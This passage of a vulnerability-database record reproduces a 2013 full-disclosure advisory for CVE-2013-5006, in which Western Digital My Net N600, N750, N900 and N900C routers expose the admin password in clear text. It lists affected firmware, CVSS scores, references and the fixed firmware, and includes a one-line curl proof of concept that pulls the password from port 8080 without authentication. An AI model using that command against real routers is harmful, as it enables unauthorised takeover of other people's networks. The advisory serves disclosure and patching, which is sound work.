- http://xforce.iss.net/xforce/xfdb/85903 \nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433 \nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006 \n \nVendor's Network Router Product Pages: \nhttp://www.wdc.com/en/products/network/routers/ \nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564 \nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436 \nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879 \nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950 \n \nAdditional Notes/Fixes/Workarounds: \n \nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected. \n \nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities. \n \nDiscovered - 07-02-2013 \nUpdated - 07-31-2013 \nResearch Contact - K Lovett \nAffiliation - SUSnet \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122640/wdmynetn-disclose.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nVulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score \t 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Expoit Score\t 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass="";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\r\n", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "SECURITYVULNS:DOC:29702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29702", "title": "Update: Full Disclosure - WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Unauthorized access, information leakages.", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "SECURITYVULNS:VULN:13199", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13199", "title": "WD My Net security vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}